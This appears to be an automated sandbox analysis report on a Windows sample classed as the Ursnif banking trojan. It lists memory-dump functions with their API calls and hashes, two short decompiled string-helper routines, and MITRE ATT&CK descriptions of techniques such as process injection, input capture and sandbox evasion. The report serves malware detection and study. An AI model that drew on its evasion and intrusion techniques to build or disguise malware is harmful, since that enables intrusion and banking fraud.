0bH, xrefs: 001EA356, 001EA360

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: CriticalSection$EnterInit_thread_footerLeave___std_exception_copy___std_exception_destroy
String ID: 0bH
API String ID: 1355273073-4108778501
Opcode ID: 6204e8c576a8d06966e96842b1ee4f093a948be41013cff164471c1b9984784e
Instruction ID: d48e67b3116b14299dda7d8f39b391a2bb9ae139ffdb3333b39d3b06ca606879
Opcode Fuzzy Hash: 6204e8c576a8d06966e96842b1ee4f093a948be41013cff164471c1b9984784e
Instruction Fuzzy Hash: B981C9B4E00649CFCB01CF98D984AAEBBF4FF49314F158169E809AB351DB74A948CF91

Uniqueness

Uniqueness Score: -1.00%

Function 001EA3A0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 192COMMON

Download Yara Rule

APIs

Part of subcall function 001F0B10: ___std_exception_copy.LIBVCRUNTIME ref: 001F0B5B

___std_exception_destroy.LIBVCRUNTIME ref: 001EA628

Part of subcall function 00346EC2: RtlEnterCriticalSection.NTDLL(004E9A1C), ref: 00346ECD
Part of subcall function 00346EC2: RtlLeaveCriticalSection.NTDLL(004E9A1C), ref: 00346F0A

__Init_thread_footer.LIBCMT ref: 001EA5E4

Strings

bH, xrefs: 001EA616, 001EA620

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: CriticalSection$EnterInit_thread_footerLeave___std_exception_copy___std_exception_destroy
String ID: bH
API String ID: 1355273073-3904921461
Opcode ID: c5b54299ce27e360f37878d78f4d1ce8f99dcf1856ef7046426494589d4a8d71
Instruction ID: 2ee2e8f59139406d46586616453dd283d185f346c837ebcfae36292a2ec0b8b0
Opcode Fuzzy Hash: c5b54299ce27e360f37878d78f4d1ce8f99dcf1856ef7046426494589d4a8d71
Instruction Fuzzy Hash: 0F8188B4E00288CFCB11CF99D984AAEBBF4FF49314F158169E909AB351DB74A944CF91

Uniqueness

Uniqueness Score: -1.00%

Function 001BF1D0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 160COMMON

Download Yara Rule

Strings

PkH, xrefs: 001BF21D, 001BF3BC

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID:
String ID: PkH
API String ID: 0-1844677740
Opcode ID: 31a6f9d2cde9ea922cdcec17dd1e370213936966ec34d9a13e41358936e95913
Instruction ID: 25cbe2e1296830f9332e8c9a6972b953ccc5486d8436623eef3a79f337584422
Opcode Fuzzy Hash: 31a6f9d2cde9ea922cdcec17dd1e370213936966ec34d9a13e41358936e95913
Instruction Fuzzy Hash: 2551D330A042089BCB24DF25DC817EAB7F5EF55320F6485AEE889D7251D771ED86CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001BFFF0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(?), ref: 001C0024
RtlLeaveCriticalSection.NTDLL(00000000), ref: 001C01DA

Part of subcall function 001BFC10: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,?), ref: 001BFC2E
Part of subcall function 001BFC10: RtlEnterCriticalSection.NTDLL(?), ref: 001BFC3D
Part of subcall function 001BFC10: RtlLeaveCriticalSection.NTDLL(?), ref: 001BFC67

Strings

PkH, xrefs: 001C01C2

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: CriticalSection$EnterLeave$CompletionPostQueuedStatus
String ID: PkH
API String ID: 3067750800-1844677740
Opcode ID: 299844696fe6d68fa50148d48f5798993188d68980494fd52db80db1efe16421
Instruction ID: 212c340bb1d441873dcc15627d658bb4a421ebcccad14c340cf57d3aa370c323
Opcode Fuzzy Hash: 299844696fe6d68fa50148d48f5798993188d68980494fd52db80db1efe16421
Instruction Fuzzy Hash: 23616A75A00609EFCB15CF64D880BEAFBB5FF19304F18825EE815A7341D731AA54CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001C0200, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(?), ref: 001C0234
RtlLeaveCriticalSection.NTDLL(?), ref: 001C037F

Strings

PkH, xrefs: 001C02C5, 001C0364

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: CriticalSection$EnterLeave
String ID: PkH
API String ID: 3168844106-1844677740
Opcode ID: 76ab8f90d77478902eea0a10bffb7e141299d9b3982890f9c6ebda77453aa207
Instruction ID: 67d4d9f6085b47ac443279bf9867bf9589442ecb3e8f294fb0aa48a0de04990d
Opcode Fuzzy Hash: 76ab8f90d77478902eea0a10bffb7e141299d9b3982890f9c6ebda77453aa207
Instruction Fuzzy Hash: 0B514BB1A01209DFCB15CF98D584BAEBBF5FF68314F14825EE804AB241E775E945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001DE420, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 001DE47F
___std_exception_destroy.LIBVCRUNTIME ref: 001DE57D

Strings

@)G, xrefs: 001DE4C5

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: ___std_exception_copy___std_exception_destroy
String ID: @)G
API String ID: 2970364248-589635338
Opcode ID: dafc7e8dbad417f30b9e199b90b981e5e1c39b86384c6e4b7175d322ab2e19e1
Instruction ID: 7a5ad248a196c060aee7c1e69215d6ca21d3d71ca409a4ba08351f69ec6c4c62
Opcode Fuzzy Hash: dafc7e8dbad417f30b9e199b90b981e5e1c39b86384c6e4b7175d322ab2e19e1
Instruction Fuzzy Hash: B34169B4E02648EBCB04DF95D984ADEFBF5FF48318F24415AE405AB340E774AA04CB94

Uniqueness

Uniqueness Score: -1.00%

Function 001DE5A0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 001DE5FF
___std_exception_destroy.LIBVCRUNTIME ref: 001DE6FD

Strings

hhH, xrefs: 001DE6A5

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: ___std_exception_copy___std_exception_destroy
String ID: hhH
API String ID: 2970364248-1822845831
Opcode ID: 7c7dd76d2c5def5100dde8f3851049fc17bfccd877718458968226908ce6fd56
Instruction ID: 80b1b88865926afa54cd1eb72029cd47c1aae7ddc93df5fbd0725e38bd7cd9e8
Opcode Fuzzy Hash: 7c7dd76d2c5def5100dde8f3851049fc17bfccd877718458968226908ce6fd56
Instruction Fuzzy Hash: BE4146B4E02648EBCF05DF99DA85ADDFBF5EF49304F24415AE404AB340D7B5AA08CB54

Uniqueness

Uniqueness Score: -1.00%

Function 001C09C0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

select.WS2_32(?,00000000,00000001,?,?), ref: 001C0A2D

Strings

PkH, xrefs: 001C0A73, 001C0ADD

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: select
String ID: PkH
API String ID: 1274211008-1844677740
Opcode ID: d2b26b4e9b2f3b99b095d21d48456dc3b92c356a656cebb8a259cb012cc60ec8
Instruction ID: 3eb02d775154658caee563ca77ff1daaca5389b501d72be7c5018a767973a9c0
Opcode Fuzzy Hash: d2b26b4e9b2f3b99b095d21d48456dc3b92c356a656cebb8a259cb012cc60ec8
Instruction Fuzzy Hash: F5416F7494121DDBCB21DF54D888BD9BBB8EF28314F1046DAE859A7281D774AEC4CF90

Uniqueness

Uniqueness Score: -1.00%

Function 001CEE60, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

Part of subcall function 001D3520: SetEvent.KERNEL32(00000000), ref: 001D35BE

setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 001CEEE4

Strings

set_option, xrefs: 001CEF42
PkH, xrefs: 001CEEAF, 001CEED0

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: Eventsetsockopt
String ID: PkH$set_option
API String ID: 2929583802-48871339
Opcode ID: 15b0f4501250648bd0e5d6ef1b0a6f0b7b58f15e7697706ab1db8234d9e775f8
Instruction ID: eb389abc376a944dc4c1915a55b3249e68e1b5de5f72f6ce5f34a4a495ee62ca
Opcode Fuzzy Hash: 15b0f4501250648bd0e5d6ef1b0a6f0b7b58f15e7697706ab1db8234d9e775f8
Instruction Fuzzy Hash: B0319E31A002099FDB14DFA9C844BEEBBF4EF24724F14465EE521673C0DB79AA44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00351013, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 0034EA21: pDNameNode::pDNameNode.LIBCMT ref: 0034EA47

DName::DName.LIBVCRUNTIME ref: 003510D2
DName::operator+.LIBCMT ref: 003510E0

Strings

H4G, xrefs: 00351063

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: Name$Name::Name::operator+NodeNode::p
String ID: H4G
API String ID: 3257498322-3529122478
Opcode ID: 5f3e4e4953d8985f13053eeed0007ccbfd0220a4176bdaa2034d0ae698ac4343
Instruction ID: c99ba5843a01b579382044dba67ac91a19a10635198bc7ed769ac59c598d0c1c
Opcode Fuzzy Hash: 5f3e4e4953d8985f13053eeed0007ccbfd0220a4176bdaa2034d0ae698ac4343
Instruction Fuzzy Hash: 5D21627580014DEFDB06DF90C855EFE7BB8FB04341F00815AE9156B2A1EB746688CF91

Uniqueness

Uniqueness Score: -1.00%

Function 001E5A30, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 001E5A56

Strings

8iH, xrefs: 001E5AA0
hH, xrefs: 001E5A99

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: ___std_exception_copy
String ID: 8iH$hH
API String ID: 2659868963-2695756358
Opcode ID: 7d76ddba4ad56048480b61e981a4ce88e4dc1c5a18506216adb33d035f6dfd34
Instruction ID: f0141dc17f5444ed0843abebc654ca5e477b401030085dd2adbc2c907a106965
Opcode Fuzzy Hash: 7d76ddba4ad56048480b61e981a4ce88e4dc1c5a18506216adb33d035f6dfd34
Instruction Fuzzy Hash: D701E4B5900B0AABC701EF59D544646FBF8FF59720B15C71AE0289BA40E3B4F5A8CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 00348D31, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00348D3D

Part of subcall function 0034BCA3: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,00348D50,?,h8/K,?), ref: 0034BD03

Strings

PS/, xrefs: 00348D4A
h8/K, xrefs: 00348D42

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: ExceptionRaisestd::invalid_argument::invalid_argument
String ID: PS/$h8/K
API String ID: 2617407040-4169199794
Opcode ID: dd5a67da07fececbb75837ec8d165879b284bbf241c2cbe83fe14a654b943da0
Instruction ID: 3693893bea585145aa8aaacfc83a0cd73a04f21515d1c789aba726124db69d01
Opcode Fuzzy Hash: dd5a67da07fececbb75837ec8d165879b284bbf241c2cbe83fe14a654b943da0
Instruction Fuzzy Hash: 04C08C38C0020CB7CB01FBF0C986ECEFBBC9A04700F404820BA109A0C1EFB4BA0996E1

Uniqueness

Uniqueness Score: -1.00%

Function 02CE8CFA, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E02CE8CFA(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E02CE1525(_t2);
				if(_t34 != 0) {
					_t30 = E02CE1525(_t28);
					if(_t30 == 0) {
						E02CE8B22(_t34);
					} else {
						_t39 = _a4;
						_t22 = E02CEA7C2(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E02CEA7C2(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x02ce8cfa
0x02ce8d04
0x02ce8d06
0x02ce8d0c
0x02ce8d0c
0x02ce8d15
0x02ce8d19
0x02ce8d25
0x02ce8d29
0x02ce8d9d
0x02ce8d2b
0x02ce8d2b
0x02ce8d2f
0x02ce8d34
0x02ce8d39
0x02ce8d53
0x02ce8d42
0x02ce8d42
0x02ce8d46
0x02ce8d49
0x02ce8d4e
0x02ce8d4e
0x02ce8d58
0x02ce8d80
0x02ce8d86
0x02ce8d89
0x02ce8d5a
0x02ce8d5c
0x02ce8d64
0x02ce8d6f
0x02ce8d74
0x02ce8d74
0x02ce8d90
0x02ce8d97
0x02ce8d98
0x02ce8d98
0x02ce8d29
0x02ce8da8

APIs

lstrlen.KERNEL32(00000000,00000008,?,76D24D40,?,?,02CE9816,?,?,?,?,00000102,02CE937B,?,?,00000000), ref: 02CE8D06

Part of subcall function 02CE1525: RtlAllocateHeap.NTDLL(00000000,00000000,02CE1278), ref: 02CE1531

Part of subcall function 02CEA7C2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,02CE8D34,00000000,00000001,00000001,?,?,02CE9816,?,?,?,?,00000102), ref: 02CEA7D0
Part of subcall function 02CEA7C2: StrChrA.SHLWAPI(?,0000003F,?,?,02CE9816,?,?,?,?,00000102,02CE937B,?,?,00000000,00000000), ref: 02CEA7DA

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02CE9816,?,?,?,?,00000102,02CE937B,?), ref: 02CE8D64
lstrcpy.KERNEL32(00000000,00000000), ref: 02CE8D74
lstrcpy.KERNEL32(00000000,00000000), ref: 02CE8D80

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 8b11eac3d6afb9794be744966938de9720c094c193a10607dbac81e731bddbb2
Instruction ID: 1c38d82e18aeb989aaba4be8c6d4a4fa5d6820e40b3011b53da3959126342164
Opcode Fuzzy Hash: 8b11eac3d6afb9794be744966938de9720c094c193a10607dbac81e731bddbb2
Instruction Fuzzy Hash: BC21DF72500256FFCF02AF79C844BAE7FB9AF56384B058651F8069B220DB34CB10DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02CE272D, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02CE272D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E02CE1525(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x02ce2742
0x02ce2746
0x02ce2750
0x02ce2755
0x02ce275a
0x02ce275c
0x02ce2764
0x02ce2769
0x02ce2777
0x02ce277c
0x02ce2786

APIs

lstrlenW.KERNEL32(004F0053,?,76D25520,00000008,03BA935C,?,02CE5398,004F0053,03BA935C,?,?,?,?,?,?,02CE7CCB), ref: 02CE273D
lstrlenW.KERNEL32(02CE5398,?,02CE5398,004F0053,03BA935C,?,?,?,?,?,?,02CE7CCB), ref: 02CE2744

Part of subcall function 02CE1525: RtlAllocateHeap.NTDLL(00000000,00000000,02CE1278), ref: 02CE1531

memcpy.NTDLL(00000000,004F0053,76D269A0,?,?,02CE5398,004F0053,03BA935C,?,?,?,?,?,?,02CE7CCB), ref: 02CE2764
memcpy.NTDLL(76D269A0,02CE5398,00000002,00000000,004F0053,76D269A0,?,?,02CE5398,004F0053,03BA935C), ref: 02CE2777

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 3b087710bf9b8b6f4563dea79dfa98154482fc4df83ba571beda7fb127710b73
Instruction ID: c5cb3e667d74f1b75e38efd9fef61dc2f28e22a5e0a53e5b83e72e24a0fb8e61
Opcode Fuzzy Hash: 3b087710bf9b8b6f4563dea79dfa98154482fc4df83ba571beda7fb127710b73
Instruction Fuzzy Hash: 69F03772900118BBCF11AFA9CC84C9E7BADEF082987054062ED09A7201EA35EA109BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02CEA677, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(03BA9B78,00000000,00000000,73FCC740,02CE9DCB,00000000), ref: 02CEA687
lstrlen.KERNEL32(?), ref: 02CEA68F

Part of subcall function 02CE1525: RtlAllocateHeap.NTDLL(00000000,00000000,02CE1278), ref: 02CE1531

lstrcpy.KERNEL32(00000000,03BA9B78), ref: 02CEA6A3
lstrcat.KERNEL32(00000000,?), ref: 02CEA6AE

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 8f4d6553d0ada6d2f9ed8a280f8ec1b691c470708e9bf467fc34a985954c01db
Instruction ID: e262e49d8f5d0a4e4c0d41cb91e14af141e57e8b550d210e962017f6ae7b272b
Opcode Fuzzy Hash: 8f4d6553d0ada6d2f9ed8a280f8ec1b691c470708e9bf467fc34a985954c01db
Instruction Fuzzy Hash: 59E09273D01221AB8B11AFE8AC48D9FBBBDEF9A6613040917FA01D7100C734CA218BE1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report jXzrIReInY

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

